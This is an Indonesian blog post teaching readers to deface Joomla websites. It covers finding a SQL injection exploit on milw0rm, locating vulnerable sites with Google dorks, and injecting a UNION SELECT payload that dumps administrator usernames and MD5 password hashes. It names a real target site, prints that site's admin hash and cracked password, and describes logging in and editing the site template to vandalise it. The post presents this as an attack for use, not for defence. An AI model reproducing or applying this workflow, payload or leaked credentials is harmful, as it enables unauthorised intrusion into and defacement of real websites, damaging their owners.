Search This Blog

Sunday, November 30, 2008

Cara Defacing JOOMLA ...

Assalamu'alaikum semua……..

apa kabar???

halah kebanyakan basa basi lu Lal….. heheheheh

belajar deface web yang pake sistem joomla yuk (dah pada tahu kan apa itu deface?kalau ga tahu silahkan googling dulu deh)

Tapi… jangan bilang siapa-siapa, ntar gw kena UU ITE

kapan mulainya????

ini juga baru mau mulai

kita belajar via public exploit yang di milw0rm aja ya.

ok. Let started.

1. Buka milw0rm

2. Klik link Search.

3. ketikkan joomla

4. Pilih exploit yang mau digunakan… (untuk hal ini, pilih yang akhirannya SQL Injection Vulnerability )

Ok, aku kasih contoh. yang kupakai adalah Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability. Nah sekarang klik itu, maka akan terpampang tulisan awut awutan

kita fokuskan ke tulisan dork dan exploit

dork adalah kata kunci pencarian targe di google dan exploit, adalah script atau link atau apalah yang digunakan oleh cracker ( ya kita ini ). Dah, kebanyakan basa basi.

5. Cari target. Karena ada dua dork, yaitu

1. inurl: "com_alphacontent"
2. "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"

maka pilih salah satunya. (info : ane pake yang pertama ). Taruh di google,lalu search! Nah,tinggal pilih, site mana yang bakal kau rusak (dan bisa dirusak tentunya karena ga semuanya bisa dirusak)

ok,got it!. aku pilih

http://www.scoutsnsr.org/nsr/index.php?option=com_alphacontent&Itemid=56α=m&section=all&cat=all

lihat exploit yang tadi. exploit tersebut adalah:

index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*

5. Exploitasi

Sisipkan exploit pada url target menjadi

http://www.scoutsnsr.org/nsr/index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*

ada perbedaan yang mencolok di site tersebut???see above, pada title websitenya.

scoutsnsr.org - admin>60a74d46ec9853a243a953dc361a1227

hoho…itu adalah username administator dan passwordnya tapi kok passwordnya gitu?

yup! itulah yang dinamakan MD5 kita harus crack MD5 itu dulu. But how?

remember, google adalah mesin pencari yang sangat hebat. Coba aja cari dulu di goole dengan memasukkan md5 yang di encrypt itu…

ok,do it now! searching…

gotcha!!! ada!!!

60a74d46ec9853a243a953dc361a1227:nabuco2

how how how….my lucky day.sekarang masuk ke sistemnya

how?

site yang memakai sistem joomla/mambo.letak page administrator login adalah

http://[site]/administrator

jadi,untuk masuk ke page login administrator web di atas, adalah

http://www.scoutsnsr.org/nsr/administrator/

joomla spanish. (pada bisa spanish ga neh? )

so what gitu lho

sekarang masukkan username dan passwordna.

username : admin

password : nabuco2

enter!

gotcha!!! this site was owned!!! look of the top! sistema poseído!!!

6. Finishing eh salah, Defacing

dah, pelajari sendiri aja tuh system joomla. ga tahu bahasanya?les dulu!!!

kalau mau deface, arahkan pointer ke sitio / site >> Administrador de Plantillas / Template Manager >> Plantillas de Sitio / Site Templates. Nah disana, ada beberapa template yang dipake administratornya. Pilih defaultnya (kalau di site di atas, defaultnya JA Antares ) lalu Edit HTML. Terserah deh, mau ente apain tuh site. Silahkan ekslporasi sendiri deh mau ente design gimana tuh site.

dah ah, kalau masih bingung, via comment atau Y!M aja yah

maunya si bikin tutor video, tapi ga punya softnya

takut dikejar cyber interpol, kabur aja ah…………

pengetahuan tak akan kita bawa sampai mati, jadi bagikanlah

LinkWithin

Related Posts Plugin for WordPress, Blogger...